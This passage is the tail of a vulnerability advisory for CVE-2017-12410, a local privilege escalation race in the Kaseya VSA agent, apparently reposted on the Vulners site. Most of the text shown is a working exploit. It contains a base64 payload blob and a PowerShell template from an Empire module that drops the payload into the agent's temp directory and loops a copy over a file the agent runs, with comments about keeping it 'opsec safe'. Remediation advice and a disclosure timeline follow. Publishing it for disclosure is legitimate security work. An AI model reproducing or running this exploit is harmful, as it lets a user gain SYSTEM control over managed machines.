PCM8LTxFPFM8fTyUPK48wTziPPA8ED0ZPSc9cD2GPZo9uj3APcY9zz3VPQg+Dj4oPmE+cD51Pn4+hT6OPrU+0z7ZPt8+BD8KPzE/Nz9EP24/kT+eP6g/wz/NP9g/3j/xP/s/AAAAIAAAdAAAABMwGTDNMOEw7zD2MPswRTFTMWExbDFxMXcxtTHBMc8x1jHlMQEyDzIWMhsyVTJhMm0yhTKTMqEyqzKyMrgyBzMhMy8zNTM7M3QznjMSNBo0IjQqNDI0OjRCNEo0UjRaNGI0ajRyNHo0gjSkNAAwAAAMAAAAADAAAABAAAAQAAAAqDusO7A7AAAAgAAAEAAAAAwwGDAcMAAAAJAAABAAAAAEMAgwDDAQMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
  
\$path_opt = "%s"  
\$exec_opt = "%s"  
  
if (\$path_opt.compareTo("work") -eq 0) {  
if (\$exec_opt.compareTo("default") -eq 0) {  
\$exec_opt = "NetUserStateAudit.exe"  
}  
\$uid = Get-ChildItem "hklm:\SOFTWARE\Kaseya\Agent" -Name  
\$path = Get-ItemPropertyValue "hklm:\SOFTWARE\Kaseya\Agent\\$uid" `  
-Name TempPath  
[io.file]::WriteAllBytes(  
"\$path\kaseya.exe",  
[System.Convert]::FromBase64String(\$exe)  
)  
"powershell.exe %s" > "\$path\kaseya.ps1"  
Remove-Item "\$path\kaseya.bat"  
Add-Content "\$path\kaseya.bat" "cd \$path"  
Add-Content "\$path\kaseya.bat" ":l"  
Add-Content "\$path\kaseya.bat" "copy kaseya.exe \$exec_opt"  
Add-Content "\$path\kaseya.bat" "goto l"  
} else {  
if (\$exec_opt.compareTo("default") -eq 0) {  
\$exec_opt = "kawmi.dll"  
}  
\$path = "C:\\temp"  
[io.file]::WriteAllBytes(  
"\$path\kaseya.dll",  
[System.Convert]::FromBase64String(\$dll)  
)  
Remove-Item "\$path\kaseya.bat"  
Add-Content "\$path\kaseya.bat" "cd \$path"  
Add-Content "\$path\kaseya.bat" ":l"  
Add-Content "\$path\kaseya.bat" "copy kaseya.dll \$exec_opt"  
Add-Content "\$path\kaseya.bat" "goto l"  
}  
  
# TODO: add check if we already won a race and kill the loop  
Start-Process "\$path\kaseya.bat"  
  
#while(1) {  
# try {  
# # FIXME: test Copy-Item to make it opsec safe  
# #Copy-Item "\$path\kaseya.exe" "\$path\NetUserStateAudit.exe" `  
# #-ErrorAction SilentlyContinue  
# Copy-Item "\$path\kaseya.exe" "\$path\NetUserStateAudit.exe"  
# } catch [System.Exception] {  
# continue  
# }  
#}  
  
''' % (path, execName, encLauncher)  
  
return script  
EOF  
--  
  
Remediation:  
- Restrict permissions for users who can modify directories and files used  
by the Kaseya VSA.  
- Contact vendor for details.  
  
Timeline:  
03.08.2017: Initial contact email sent to [email protected] with  
information about the vulnerability.  
03.08.2017: Notification sent to vendor that CVE-2017-12410 has been  
assigned for this vulnerability by MITRE.  
05.08.2017: Vendor confirms receiving the information about the  
vulnerability and informs that the development team is looking  
into the issue.  
19.11.2017: No vendor response. Request for a status update.  
10.02.2018: No vendor response. Notifying vendor about the planned advisory  
release.  
11.02.2018: Vendor replies with information that the fix is ready, they are  
in the process of backporting it across a three versions of  
their code, testing it, releasing patches and rolling it out  
across their sass (sic!) versions. Vendor requests to postpone  
publication of the advisory for 30 days to ensure that patches  
are tested and ready for release.  
12.02.2018: Confirmation sent that the publication of the advisory will be  
postponed.  
12.02.2018: Vendor acknowledges and commits to provide a weekly updates as  
they progress to release.  
20.03.2018: No vendor response. Advisory published.  
23.03.2018: The advisory is released.  
  
References:  
[1] https://www.kaseya.com/products/vsa  
  
Acknowledgments:  
- Mike Puglia (Kaseya)  
- Niket Khosla (Telstra)  
- Telstra BTS Security Services ([email protected])  
  
  
Thanks,  
Filip Palian  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Mar 2018 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.00042
kaseyavsaagentmon.exelocal privilege escalationwindowsauthenticated usersnt authority\systemtoctouempire moduletime of check & time of usepoc
127